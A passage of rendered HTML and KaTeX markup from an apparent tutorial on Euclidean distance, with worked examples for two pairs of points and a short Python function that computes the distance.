&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1.04em;vertical-align:-0.12556999999999996em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord sqrt&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.9144300000000001em;&quot;&gt;&lt;span class=&quot;svg-align&quot; style=&quot;top:-3em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot; style=&quot;padding-left:0.833em;&quot;&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.8744300000000003em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;hide-tail&quot; style=&quot;min-width:0.853em;height:1.08em;&quot;&gt;&lt;svg width=&quot;400em&quot; height=&quot;1.08em&quot; viewBox=&quot;0 0 400000 1080&quot; preserveAspectRatio=&quot;xMinYMin slice&quot;&gt;&lt;path d=&quot;M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.12556999999999996em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.64444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
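&lt;p&gt;If it helps to see those steps as code, here&#39;s a minimal Python sketch. The function name &lt;code&gt;euclidean_distance&lt;/code&gt; is made up for illustration, and the points are read off the arithmetic above, assuming p = (3, 4) and q = (4, 4).&lt;/p&gt;

```python
import math


def euclidean_distance(p, q):
    """Return the straight-line distance between two points of equal dimension."""
    if len(p) != len(q):
        raise ValueError("p and q must have the same number of coordinates")
    # Square each per-coordinate difference (q_i - p_i).
    squared_differences = [(qi - pi) ** 2 for pi, qi in zip(p, q)]
    # Sum the squares, then take the square root to get d.
    return math.sqrt(sum(squared_differences))


# Assumed points, inferred from the worked arithmetic: p = (3, 4), q = (4, 4).
first = euclidean_distance((3, 4), (4, 4))
```

&lt;p&gt;Python 3.8 and later also ship &lt;code&gt;math.dist(p, q)&lt;/code&gt; in the standard library, which should give the same result without the hand-rolled loop.&lt;/p&gt;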
&lt;p&gt;All that work for a &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;1&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.64444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;! Alas. We can do the same but where &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;p=(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span 
class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;q = (3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; 
style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;:&lt;/p&gt;
&lt;p class=&quot;katex-block&quot;&gt;&lt;span class=&quot;katex-display&quot;&gt;&lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot; display=&quot;block&quot;&gt;&lt;semantics&gt;&lt;mtable rowspacing=&quot;0.24999999999999992em&quot; columnalign=&quot;right left&quot; columnspacing=&quot;0em&quot;&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;7&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;8&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mo 
stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msup&gt;&lt;mn&gt;7&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;49&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msup&gt;&lt;mn&gt;8&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;64&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;msqrt&gt;&lt;mrow&gt;&lt;mn&gt;49&lt;/mn&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mn&gt;64&lt;/mn&gt;&lt;/mrow&gt;&lt;/msqrt&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;≈&lt;/mo&gt;&lt;mn&gt;10.63&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; 
displaystyle=&quot;true&quot;&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;≈&lt;/mo&gt;&lt;mn&gt;10.63&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;&#92;begin{aligned}
q_1 - p_1 = 3 - (-4) &amp;amp;= 7 &#92;&#92;
q_2 - p_2 = 4 - (-4) &amp;amp;= 8 &#92;&#92;
(q_1 - p_1)^2 = 7^2 &amp;amp;= 49 &#92;&#92;
(q_2 - p_2)^2 = 8^2 &amp;amp;= 64 &#92;&#92;
&#92;sqrt{49 + 64} &amp;amp;&#92;approx 10.63 &#92;&#92;
d &amp;amp;&#92;approx 10.63
&#92;end{aligned}
&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:9.122646000000003em;vertical-align:-4.311323000000002em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mtable&quot;&gt;&lt;span class=&quot;col-align-r&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:4.811323000000001em;&quot;&gt;&lt;span style=&quot;top:-6.971323000000001em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span 
class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-5.471323em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span 
class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; 
style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-3.947215em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; 
style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; 
